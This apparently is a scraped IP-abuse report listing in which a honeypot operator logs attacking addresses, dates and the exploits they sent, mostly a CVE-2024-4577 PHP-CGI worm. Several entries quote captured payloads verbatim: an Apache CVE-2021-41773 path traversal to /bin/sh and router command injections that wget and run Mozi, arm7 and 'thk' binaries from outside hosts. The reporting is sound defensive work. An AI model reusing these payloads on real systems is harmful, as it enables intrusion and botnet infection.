π¨π³
120.241.79.66
03 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 213 times; AbuseIPDB score=100% reports=1961; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π©πͺ
2.26.86.54
03 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 15 times; AbuseIPDB score=100% reports=34; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΉπ
158.173.159.116
03 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 23 times; AbuseIPDB score=100% reports=36; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΈπͺ
79.76.58.113
03 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 194 times; AbuseIPDB score=100% reports=1381; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π¨π³
115.190.165.143
03 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 23 times; AbuseIPDB score=100% reports=135; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π¨π³
120.241.79.66
02 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 213 times; AbuseIPDB score=100% reports=1989; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π©πͺ
2.26.86.54
02 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 15 times; AbuseIPDB score=100% reports=33; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΉπ
158.173.159.116
02 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 23 times; AbuseIPDB score=100% reports=36; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΈπͺ
79.76.58.113
02 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 194 times; AbuseIPDB score=100% reports=1395; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π¨π³
115.190.165.143
02 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 23 times; AbuseIPDB score=100% reports=115; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π°π·
43.155.172.154
01 Jun 2026
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: ...
show more
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
show less
Port Scan
Web App Attack
πΉπ
182.52.133.34
01 Jun 2026
Honeypot: IoT router RCE (Netgear/HNAP). C2 payload URL: http://182.52.133.34:37578/Mozi.m. Path: /s ...
show more
Honeypot: IoT router RCE (Netgear/HNAP). C2 payload URL: http://182.52.133.34:37578/Mozi.m. Path: /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.52.133.34:37578/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
show less
Port Scan
Web App Attack
π«π·
167.86.72.220
01 Jun 2026
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: ...
show more
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
show less
Port Scan
Web App Attack
πΊπΈ
167.172.152.94
01 Jun 2026
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: ...
show more
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
show less
Port Scan
Web App Attack
π³π±
45.198.224.22
01 Jun 2026
Honeypot: exploit attempt. C2 payload URL: http://31.56.209.220/arm7. Path: /cgi-bin/shortcut_telnet ...
show more
Honeypot: exploit attempt. C2 payload URL: http://31.56.209.220/arm7. Path: /cgi-bin/shortcut_telnet.cgi?cd%20/tmp%3Brm%20arm7%3Bwget%20http%3A//31.56.209.220/arm7%3Bchmod%20777%20*%3B./arm7%20gigasex
show less
Port Scan
Web App Attack
π¨π³
120.241.79.66
01 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 213 times; AbuseIPDB score=100% reports=1996; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π©πͺ
2.26.86.54
01 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 15 times; AbuseIPDB score=100% reports=34; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΉπ
158.173.159.116
01 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 23 times; AbuseIPDB score=100% reports=37; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΈπͺ
79.76.58.113
01 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 194 times; AbuseIPDB score=100% reports=1446; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
π¨π³
115.190.165.143
01 Jun 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 23 times; AbuseIPDB score=100% reports=89; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack
πΊπΈ
85.239.151.41
01 Jun 2026
Honeypot: exploit. C2 URL: http://85.239.151.41/thk. Command: POST /device.rsp?opt=sys&cmd=___S_O_S_ ...
show more
Honeypot: exploit. C2 URL: http://85.239.151.41/thk. Command: POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F85.239.151.41%2Fthk%3B+chmod+777+thk%3B+.%2Fthk
show less
Port Scan
Web App Attack
π©πͺ
87.106.164.149
31 May 2026
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: ...
show more
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
show less
Port Scan
Web App Attack
π¬π§
185.38.148.2
31 May 2026
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: ...
show more
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
show less
Port Scan
Web App Attack
πΉπ·
202.133.90.219
31 May 2026
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: ...
show more
Honeypot: Apache path traversal RCE (CVE-2021-41773). C2 payload URL: http://14.46.136.77/sh. Path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
show less
Port Scan
Web App Attack
π¨π³
120.241.79.66
31 May 2026
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 4 ...
show more
CVE-2024-4577 PHP-CGI RCE worm bot. Directly observed POSTing exploit payload to our honeypot. C2: 46.151.182.82. Worm self-replicates by exploiting PHP-CGI servers. Evidence: directly hit our honeypot 213 times; AbuseIPDB score=100% reports=1997; appears in 4 sensor tags. Confidence score: 85/100 (multi-source verified).
show less
Port Scan
Web App Attack